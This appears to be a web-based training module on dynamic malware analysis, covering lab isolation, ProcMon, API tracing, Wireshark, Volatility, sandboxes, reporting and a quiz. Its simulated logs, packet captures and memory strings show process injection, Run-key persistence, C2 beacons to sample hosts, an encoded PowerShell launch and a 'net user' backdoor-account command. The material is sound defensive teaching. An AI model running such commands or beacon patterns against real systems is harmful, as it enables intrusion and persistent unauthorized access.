← Back to Vault Dynamic Analysis
SECTION 01

What is Dynamic Analysis?

Dynamic analysis is the art of observing malware in action. Unlike static analysis where you examine the file without running it, dynamic analysis involves executing the sample in a controlled environment and watching what it does.

Think of it like this: Static analysis is reading a cookbook, dynamic analysis is watching the chef cook.

Behavioral
See what malware actually does, not what it claims
Defeats Obfuscation
Packed code must unpack itself to run
Network Activity
Capture C2 communications in real-time
Time-Based
Observe behaviors that trigger on conditions

When to Use Dynamic vs Static

Use Static When:

  • Initial triage / quick assessment
  • Sample is heavily packed
  • You need to find all possible code paths
  • Sample won't run in your environment

Use Dynamic When:

  • Need to see actual behavior
  • Investigating C2 infrastructure
  • Sample uses anti-analysis tricks
  • Time to understand < time to reverse
CRITICAL WARNING: Dynamic analysis means running live malware. ALWAYS do this in an isolated VM with snapshots. One mistake can compromise your entire network. If you're unsure, use automated sandboxes instead.
SECTION 02

Setting Up Your Lab

Your analysis lab is your fortress. One mistake and malware escapes into your production network. Here's how to build a proper isolation environment:

VM Snapshots
Take before every analysis. Revert immediately after.
Network Isolation
Host-only network or completely disconnected
Fake Internet
INetSim simulates common services
Fake DNS
FakeDNS catches all domain queries

Essential Tools Setup

# INetSim - Simulates internet services
sudo apt install inetsim
sudo service inetsim start

# Configure VM to use INetSim as DNS
# Set DNS to your INetSim host IP (e.g., 192.168.56.1)

# FakeDNS - Python alternative
git clone https://github.com/Crypt0s/FakeDNS
cd FakeDNS
python fakedns.py -c fakedns.conf
Pro Tip: Create a "golden image" VM with all analysis tools pre-installed. Clone it for each analysis, run sample, then delete the clone. Never analyze directly on the golden image.

Network Isolation Methods

Host-Only Network (Recommended)

VM can talk to host machine only. Perfect for running INetSim on host and capturing traffic.

Internal Network

Multiple VMs can talk to each other but not outside. Good for multi-machine infections.

Completely Disconnected

No network at all. Safest but limits analysis of network behavior.

Important: Sophisticated malware can detect VMs and alter behavior. Change MAC addresses, customize VM artifacts, and use bare-metal if analyzing advanced threats.
Guided Walkthrough: Analyzing a Suspicious Process

Before diving into the tools, let's walk through analyzing a malware sample step by step. You'll build a behavior diagram as you identify each indicator.

Sandbox Log: sample_7f3a.exe (PID 2048)
[09:14:01] CreateProcess sample_7f3a.exe
[09:14:01] OpenProcess(explorer.exe)
[09:14:01] VirtualAllocEx(explorer.exe)
[09:14:01] WriteProcessMemory(explorer.exe)
[09:14:02] CreateRemoteThread(explorer.exe)
[09:14:05] DNS: c2-relay.darknet.io
[09:14:05] HTTP POST /gate.php
[09:14:06] HTTP POST /gate.php (60s)
[09:14:08] CreateFile %TEMP%\payload.dll
[09:14:08] WriteFile %TEMP%\payload.dll
[09:14:09] CopyFile → %APPDATA%\svc.exe
[09:14:10] RegSetValue Run\SystemSvc
[09:14:10] SchTasks /Create /TN Update
sample_7f3a.exe PID 2048 API Process Injection VirtualAllocEx WriteProcessMemory CreateRemoteThread NET C2 Beacon c2-relay.darknet.io POST /gate.php interval: 60s Filesystem Modifications %TEMP%\payload.dll (dropped) %APPDATA%\svc.exe (installed copy) Persistence Mechanisms Registry: HKCU\...\Run\SystemSvc Scheduled Task: "Update" CLASSIFICATION RAT / Backdoor Trojan
Walkthrough complete! You've built a full malware behavior diagram. Now explore each tool in the sections below.
SECTION 03

Execution Monitoring with Process Monitor

Process Monitor (ProcMon) is your window into everything happening on the system. Every file access, registry change, and process creation - all in real-time.

File System
CreateFile, WriteFile, DeleteFile
Registry
RegSetValue, RegCreateKey
Network
TCP/UDP connections
Process
CreateProcess, Thread creation

Interactive ProcMon Filter Builder

Process Monitor - Filter Configuration
Process Name:
Operation:
Result:
12:34:56 malware.exe CreateFile C:\Users\victim\AppData\Roaming\updater.exe SUCCESS
12:34:57 malware.exe WriteFile C:\Users\victim\AppData\Roaming\updater.exe SUCCESS
12:34:58 malware.exe RegSetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater SUCCESS
12:34:59 malware.exe TCP Connect 185.234.219.45:8080 SUCCESS
12:35:00 explorer.exe ReadFile C:\Windows\explorer.exe SUCCESS
12:35:01 malware.exe CreateFile C:\Windows\System32\drivers\rootkit.sys ACCESS DENIED
First-Run Capture Technique: Start ProcMon BEFORE running the sample, then let it run for 30-60 seconds. Look for the initial burst of activity - that's usually the most revealing. Save the log before the noise becomes overwhelming.
Key Indicators to Watch For:
  • Persistence: Registry Run keys, Startup folder writes
  • File Drops: New executables in %APPDATA%, %TEMP%
  • Credential Theft: Reads from SAM, LSA, browser databases
  • Lateral Movement: Writes to network shares, PsExec activity
SECTION 04

API Tracing & Hooking

API Monitor shows you the actual Windows API calls a process makes - the low-level functions that do the real work. This is deeper than ProcMon's high-level operations.

Key API Categories to Monitor

File APIs
CreateFileW, WriteFile, DeleteFileW, MoveFileEx
Registry APIs
RegOpenKeyEx, RegSetValueEx, RegDeleteKey
Network APIs
WSAStartup, connect, send, recv, InternetOpen
Process APIs
CreateProcess, VirtualAllocEx, WriteProcessMemory

Live API Trace Example

API Monitor - Malware API Calls
GetSystemInfo SYSTEM
Parameters: ( )
Returns: [System Information Structure]
VirtualAllocEx MEMORY
hProcess: 0x1234 (explorer.exe), dwSize: 4096, flProtect: PAGE_EXECUTE_READWRITE
Returns: 0x7FFF0000
WriteProcessMemory MEMORY
hProcess: 0x1234 (explorer.exe), lpBaseAddress: 0x7FFF0000, nSize: 2048
Returns: TRUE
CreateRemoteThread PROCESS
hProcess: 0x1234 (explorer.exe), lpStartAddress: 0x7FFF0000
Returns: 0x5678 (Thread Handle)
InternetOpenW NETWORK
lpszAgent: "Mozilla/5.0", dwAccessType: INTERNET_OPEN_TYPE_DIRECT
Returns: 0x9ABC (Internet Handle)
HttpOpenRequestW NETWORK
lpszObjectName: "/gate.php", lpszVerb: "POST"
Returns: 0xDEF0 (Request Handle)
RegSetValueExW REGISTRY
hKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, lpValueName: "SystemUpdate", lpData: "C:\Users\victim\AppData\updater.exe"
Returns: ERROR_SUCCESS
Classic Process Injection Pattern: The sequence VirtualAllocExWriteProcessMemoryCreateRemoteThread is textbook process injection. The malware allocated memory in explorer.exe, wrote shellcode, and executed it. This is how it hides in legitimate processes.

Understanding API Hooking

API hooking intercepts function calls to monitor or modify behavior. Tools like API Monitor insert themselves between the malware and Windows APIs to capture everything.

Malware calls CreateFileW
    ↓
Hook intercepts call
    ↓
Hook logs: "CreateFileW(L\"secrets.txt\", GENERIC_READ, ...)"
    ↓
Hook forwards to real CreateFileW
    ↓
Returns result to malware
Pro Tip: Enable pre-defined API filters in API Monitor for "Cryptography" when analyzing ransomware. You'll immediately see CryptEncrypt calls that show what's being encrypted in real-time.
SECTION 05

Network Traffic Analysis

Wireshark is your network microscope. Every packet the malware sends - DNS queries, HTTP requests, C2 beacons - all captured and dissected.

DNS Queries
Domain lookups reveal C2 infrastructure
HTTP Traffic
POST/GET requests to command servers
SSL/TLS
Encrypted traffic (harder to analyze)
Raw TCP
Custom protocols on non-standard ports

Interactive Packet Analysis

Wireshark Capture - malware_traffic.pcap
Packet #1 DNS
Source: 192.168.1.100 Destination: 8.8.8.8 Query: c2-server.malicious-domain.com
Packet #2 DNS
Source: 8.8.8.8 Destination: 192.168.1.100 Answer: 185.234.219.45
Packet #3 TCP
Source: 192.168.1.100:49152 Destination: 185.234.219.45:8080 Flags: SYN (Connection Attempt)
Packet #4 HTTP
Method: POST /gate.php Host: 185.234.219.45 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Body: id=VICTIM-PC&os=Win10&ver=2.3&data=BASE64_ENCODED_DATA
Packet #5 HTTP
Status: 200 OK Content-Type: application/octet-stream Body: [Binary shellcode - 4096 bytes]
What Just Happened? The malware:
  1. Resolved C2 domain via DNS (Packet #1-2)
  2. Connected to C2 server (Packet #3)
  3. Sent victim information via POST (Packet #4)
  4. Received shellcode payload from C2 (Packet #5)
This is a classic C2 beacon followed by second-stage payload download.

SSL/TLS Inspection Challenges

Modern malware often uses HTTPS to hide C2 traffic. You have a few options:

SSL Interception Proxy

Install a proxy certificate on the VM and use mitmproxy or Burp Suite to decrypt traffic. Requires SSL/TLS configuration.

Metadata Analysis

Even encrypted, you can see: destination IPs, connection timing, packet sizes. Often enough to identify C2 patterns.

Wireshark Display Filters:
  • http.request.method == "POST" - Find data exfiltration
  • dns.qry.name contains "pastebin" - Popular C2 channel
  • tcp.port != 80 && tcp.port != 443 - Non-standard ports
  • ip.addr == 192.168.1.100 && http - All HTTP from victim
SECTION 06

Memory Analysis

Memory is where secrets live. Decrypted payloads, injected code, command history, credentials - all sitting in RAM even if never written to disk.

Process Memory
Running code, loaded DLLs, heap allocations
Unpacked Code
Packed malware must unpack to execute
Credentials
Passwords, hashes, tokens in cleartext
Injected Code
Shellcode hidden in legitimate processes

Volatility Framework Basics

Volatility is the premier framework for memory forensics. Point it at a memory dump and extract running processes, network connections, injected code, and more.

# List running processes
volatility -f memory.dmp windows.pslist

# Show network connections
volatility -f memory.dmp windows.netscan

# Detect process injection
volatility -f memory.dmp windows.malfind

# Dump a specific process
volatility -f memory.dmp -p 1234 windows.memmap --dump

# Extract command line history
volatility -f memory.dmp windows.cmdline

Memory Strings Analysis

Memory Dump Strings - malware.exe (PID 1234)
0x00400000 http://185.234.219.45:8080/gate.php URL
0x00401200 https://pastebin.com/raw/C2Config URL
0x00402400 SOFTWARE\Microsoft\Windows\CurrentVersion\Run REGISTRY
0x00403800 cmd.exe /c powershell -enc BASE64_PAYLOAD COMMAND
0x00404C00 MySecretEncryptionKey2024! CRYPTO KEY
0x00406000 net user admin P@ssw0rd123 /add COMMAND
0x00407400 ftp://backup-server.internal.local/exfil/ URL
Memory Dump Timing: Take a memory snapshot 30-60 seconds after malware execution. This captures initial unpacking and C2 communication before anti-analysis tricks kick in. Take multiple snapshots over time to catch time-delayed behaviors.
Common Memory Artifacts:
  • Mutexes: Unique strings malware uses to prevent multiple infections
  • Decrypted URLs: C2 domains that were encrypted in the binary
  • Shellcode: Small executable payloads injected into other processes
  • Configuration: C2 addresses, encryption keys, campaign IDs
SECTION 07

Automated Analysis & Sandboxes

Manual analysis is powerful but time-consuming. Automated sandboxes let you analyze hundreds of samples quickly, then manually investigate the interesting ones.

Cuckoo Sandbox
Self-Hosted / Open Source
  • Complete control and privacy
  • API call tracing
  • Network traffic capture
  • Memory dumps
  • YARA rule scanning
Best For: Organizations needing private analysis infrastructure or custom detection rules.
Any.Run
Cloud / Interactive
  • Real-time interaction with sample
  • Windows & Linux VMs
  • Built-in MITRE ATT&CK mapping
  • Threat intelligence integration
  • Public submission sharing
Best For: Quick analysis with ability to manually interact during execution.
Joe Sandbox
Cloud / Enterprise
  • Advanced behavior analysis
  • Code similarity detection
  • Mobile malware support
  • Deep API tracing
  • Detailed PDF reports
Best For: Enterprise environments needing comprehensive reports and threat correlation.

When to Use Automated vs Manual

Use Automation When:

  • Triaging large sample sets
  • Initial reconnaissance phase
  • Time-sensitive incident response
  • Known malware family confirmation
  • Quick IoC extraction needed

Use Manual When:

  • Advanced/targeted attack analysis
  • Sample uses sandbox evasion
  • Need to understand exact technique
  • Custom/unknown malware family
  • Preparing detailed threat report
Sandbox Evasion Techniques: Sophisticated malware can detect sandboxes and alter behavior. Look for:
  • VM artifact checks (VMware, VirtualBox registry keys)
  • Sleep/delay functions to timeout analysis
  • User interaction requirements (click dialogs, move mouse)
  • Geolocation checks (only runs in specific countries)
  • Time bombs (execute only at specific dates/times)
Hybrid Approach: Start with automated sandbox to get quick results and IoCs. If behavior looks interesting or sophisticated, switch to manual analysis for deeper investigation. Think of sandboxes as your first filter, not your only tool.
SECTION 08

Analysis Workflow & Documentation

Effective dynamic analysis follows a methodical workflow. Here's the process professional analysts use:

1
Preparation
Take VM snapshot, start monitoring tools (ProcMon, Wireshark, API Monitor), establish baseline
2
Execution
Launch malware, watch for initial burst of activity (first 60 seconds critical)
3
Observation
Monitor for 5-10 minutes, interact if needed (click dialogs, browse web), capture all logs
4
Memory Capture
Take memory dump of malicious process, pause VM before artifacts decay
5
Artifact Collection
Export logs (ProcMon, Wireshark), copy dropped files, document registry changes
6
Analysis
Review logs, analyze memory, identify IoCs, map to MITRE ATT&CK framework
7
Documentation
Write report with findings, IoCs, detection rules, and remediation steps

Report Writing Best Practices

Essential Report Sections:

Executive Summary
What it does in plain English. Threat level, affected systems, urgent actions needed.
Technical Analysis
Detailed behavior: persistence mechanisms, C2 communication, data exfiltration, lateral movement capabilities.
Indicators of Compromise (IoCs)
File hashes, IPs, domains, registry keys, mutex names, file paths - everything detection can use.
MITRE ATT&CK Mapping
Map observed behaviors to technique IDs (T1055, T1547.001, etc.) for threat hunting.
Detection & Remediation
YARA rules, Sigma rules, EDR queries, cleanup steps, hardening recommendations.
Pro Documentation Tip: Take screenshots of key moments - suspicious API calls, C2 traffic, process injection. A single screenshot can explain what takes paragraphs to write. Store them with meaningful filenames: 01-persistence-reg-key.png
SECTION 09

Analysis Challenge: Put Your Skills to Test

Scenario: Suspicious Email Attachment

You've received an incident report about a suspicious email attachment named Invoice_Q4_2024.exe. An employee opened it but claims "nothing happened."

After running dynamic analysis for 2 minutes, you observe the following behaviors. Based on what you've learned, what is the PRIMARY objective of this malware?

Observed Behaviors:
1. Creates: C:\Users\victim\AppData\Roaming\WindowsDefender\svchost.exe
2. RegSetValue: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender
3. API: VirtualAllocEx → WriteProcessMemory → CreateRemoteThread (target: explorer.exe)
4. Network: HTTP POST to 45.142.212.61/panel/check.php
5. POST Body: hwid=ABC123&os=Win10&av=defender&admin=false
6. Response: {"status":"registered","interval":3600,"tasks":[]}
What is this malware's primary purpose?
Ransomware - Encrypts files and demands payment
Wiper - Destroys data to cause maximum damage
Trojan/Backdoor - Establishes persistent remote access for future commands
Information Stealer - Immediately harvests credentials and exfiltrates
Bonus Challenge: Attack Chain Analysis

Map the observed behaviors to MITRE ATT&CK techniques. Which technique ID corresponds to the registry persistence mechanism?

T1055.001 - Process Injection: DLL Injection
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys
T1071.001 - Application Layer Protocol: Web Protocols
T1036.005 - Masquerading: Match Legitimate Name or Location

Module Complete!

You've mastered dynamic analysis techniques. You can now observe malware behavior in real-time, capture network communications, analyze memory, and document your findings like a professional analyst.

Return to Vault →
← Back to Vault Complete Module →